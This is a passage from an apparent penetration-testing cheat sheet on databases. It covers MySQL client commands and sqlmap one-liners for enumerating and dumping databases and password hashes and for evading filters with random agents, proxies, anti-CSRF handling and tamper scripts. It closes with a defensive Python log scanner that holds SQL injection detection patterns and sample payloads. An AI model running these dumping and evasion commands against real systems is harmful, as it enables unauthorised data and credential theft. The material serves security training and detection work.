Databases
Databases vary widely, each requiring specific commands, tools, and syntax. This chapter provides guidance on navigating these differences.
This chapter is in-progress.
Database Management Systems
MySQL
Connect to a MySQL server
# Local service (quote the password: an unquoted '!' triggers history expansion in interactive bash; note that a password given on the command line also lands in shell history and process listings, so "-p" alone, which prompts, is the safer habit)
mysql -u acuity -p'SuperStr00ng!'
# Remote service
mysql -u acuity -p -h <IP> -P 3306
List all databases
show databases;
Select a database
use name_of_database;
List all tables in the active database
show tables;
List content of a table
# List all content
select * from name_of_table;
# Define a more specific selection
select username, password from users where username = 'HTB';
Microsoft SQL
PostgreSQL
Tools
SQLMap
An open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. https://sqlmap.org/
Basic Data Enumeration
# Check version, user, db name and admin permissions
sqlmap -u "http://www.acuity.lab/?id=1" --banner --current-user --current-db --is-dba
Table Enumeration
# Dump everything from the MySQL server (no system databases); --batch answers every prompt with its default, so no user input is required
sqlmap -u "http://www.example.com/?id=1" --dump-all --exclude-sysdbs --batch
# Dump everything from a specific database
sqlmap -u "http://www.example.com/?id=1" -D database --dump
# Enumerate all tables within the specified DB
sqlmap -u "http://www.example.com/?id=1" --tables -D database
# Dump all data from the specified table
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database
# Dump only specific columns from specified table
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database -C name,password
# Limit rows dumped by ordinal numbers
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database --start=2 --stop=3
# Dump data based on matched conditions
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database --where="name = 'acuity'"
# alternative
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database --where="name LIKE 'acu%'"
Search for columns, tables or databases
The --search switch must be used together with one of the following options:
-C followed by a comma-separated list of column names to look for across the whole database management system.
-T followed by a comma-separated list of table names to look for across the whole database management system.
-D followed by a comma-separated list of database names to look for across the database management system.
Example:
# Search for tables containing "cred" in their name across the DBMS
sqlmap -u "http://www.example.com/?id=1" --search -T cred
Dumping database-specific credentials
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
Bypassing security measures
# Using random values
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp
# Bypassing anti-CSRF (--csrf-token names the form parameter sqlmap re-fetches before each request)
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
# Using proxy
sqlmap -u "http://www.example.com/" --proxy="socks4://203.0.113.50:3128"
# Supplying a proxy list
sqlmap -u "http://www.example.com/" --proxy-file=/opt/proxys/list.txt
# Bypassing User-Agent filters
sqlmap -u "http://www.example.com/" --random-agent
# Tamper Scripts
sqlmap -u "http://www.example.com/" --tamper=<script.py>
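Because --random-agent and --randomize only change the User-Agent header and one parameter value, a defender should key detection on the decoded query payload rather than on the client header. The following Python script is an added example, not part of this page or of sqlmap itself: it parses constructed Apache combined-format access-log lines, decodes the query string, and flags requests that carry SQL injection syntax or sqlmap's default User-Agent; the log lines, the pattern list and the function names are assumptions built for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:12:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:12:00:02 +0000] "GET /?id=1%27%20AND%20SLEEP%285%29--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
198.51.100.7 - - [10/Mar/2024:12:00:03 +0000] "GET /?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.9 - - [10/Mar/2024:12:00:04 +0000] "GET /?id=42&rp=29125 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators matched against the URL-decoded query string; they survive --random-agent
# (which only swaps the User-Agent) and --randomize (which only varies one value).
SQLI_RE = re.compile(
    r"(\bunion\b.{0,20}\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|'\s*(and|or)\b|--\s*$|/\*)",
    re.IGNORECASE,
)

def analyse_line(line):
    """Parse one access-log line; return (ip, reasons, decoded_query) or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    decoded = unquote_plus(m.group("path").partition("?")[2])  # query string only
    reasons = []
    if m.group("ua").lower().startswith("sqlmap"):  # sqlmap's default UA; trivially changed
        reasons.append("sqlmap user-agent")
    if SQLI_RE.search(decoded):  # payload content, independent of the UA header
        reasons.append("sqli pattern in query")
    return m.group("ip"), reasons, decoded

def flag_requests(log_text):
    """Return (ip, reasons, decoded_query) for every parsable request that trips an indicator."""
    hits = []
    for line in log_text.splitlines():
        parsed = analyse_line(line)
        if parsed and parsed[1]:
            hits.append(parsed)
    return hits

if __name__ == "__main__":
    for ip, reasons, query in flag_requests(SAMPLE_LOG):
        print(f"{ip}: {', '.join(reasons)}: {query}")
```

The benign fourth line, which merely carries a numeric rp value like the --randomize example, is not flagged; only the requests whose decoded payload contains injection syntax are.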